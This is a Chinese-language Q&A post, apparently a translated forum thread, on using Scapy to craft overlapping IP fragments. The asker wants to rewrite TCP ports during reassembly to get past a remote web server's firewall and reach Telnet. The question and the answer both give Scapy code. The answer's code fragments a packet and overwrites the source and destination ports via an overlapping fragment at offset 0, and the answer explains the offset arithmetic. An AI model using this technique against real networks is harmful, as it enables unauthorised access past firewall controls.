基于Scapy的重叠碎片攻击

Question

如何使用斯卡皮覆盖第一个片段的部分TCP报头信息，其中包含允许通过防火墙的数据，以及后续片段中的恶意数据？

例如:改写目标端口号以更改服务类型，即从端口80 (HTTP)更改为端口23 (Telnet)，在正常情况下不允许通过路由器。

我想要覆盖目标端口，以便连接到新的端口号。我试图绕过远程web服务器上的防火墙限制，它只允许80端口上的web流量。

我使用了这个示例代码，但没有从目标机器得到响应：

dstIP=’10.0.2.17’

frag1=IP(dst=dstIP, id=12345, proto=1, frag=0, flags=1)/TCP(dport=80)/ICMP(type=8,
code=0, chksum=0xdce8)

frag2=IP(dst=dstIP, id=12345, proto=1, frag=2, flags=1)/TCP(dport=23)/”ABABABAB”

frag3=IP(dst=dstIP, id=12345, proto=1, frag=1,flags=0)/TCP(dport=23)/”AAAAAAAABABABABACCCCCCCC”

send(frag1)
send(frag2)
send(frag3)

Answer 1

创建一个假的IP头来暗示proto=tcp。请注意，在我们讨论IP有效负载碎片碎片时，您不能修改带有片段重叠的IP报头字段。设置MF多片段标志，并通过将偏移量设置为0 frag=0来指示这是第一个片段。使用相同的IP.id, IP.src, IP.dst, IP.proto创建另一个没有设置MF标志的IP数据包(最后一个片段没有设置MF位)。此数据包将在特定偏移量处重叠IP有效负载，因此设置片段偏移量frag=x，其中有效负载中的实际位置为x*8，即offset=1是byte 8的位置(这将是TCP校验和)。

下面是一个简单的例子：

# create two IP packets, one with 1480 payload bytes and one with 4 payload bytes
# initial payload is TCP with sport/dport being 9999

frags = fragment(IP(dst=dstIP)/TCP(sport=9999,dport=9999)/("FAKE"*(1464//4)))

# [<IP  flags=MF frag=0 proto=tcp dst=10.0.2.17 |<Raw  load="'\x0f'\x0f\x00\x00\x00\x00\x00\x00\x00\x00P\x02 \x00\xd5n\x00\x00FAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKEFAKE" |>>, <IP  flags= frag=185 proto=tcp dst=10.0.2.17 |<Raw  load='FAKE' |>>]
# overwrite the 4 payload bytes of fragment 2 to overlap the reassembled IP packet at offset 0 to overwrite sport/dport to port 80,80

frags[1][Raw].load=struct.pack("!HH",80,80)  # network byteorder
frags[1][IP].frag=0
# <IP  flags= frag=0 proto=tcp dst=10.0.2.17 |<Raw  load='\x00P\x00P' |>>

# send your fragments and watch them being reassembled in wireshark/...
# they should show up the initial IP/TCP/sport=dport=9999 packet but with sport/dport being set to 80
send(frags)

这将重新组合为：

IP(dst=dstIP)/TCP(sport=80,dport=80)/("FAKE"*(1460//4))

请注意，您仍然必须修复TCP校验和，而现代防火墙通常使用IP碎片整理和TCP流重新组装来评估实际重新组装的数据包/段，而不是其片段之一。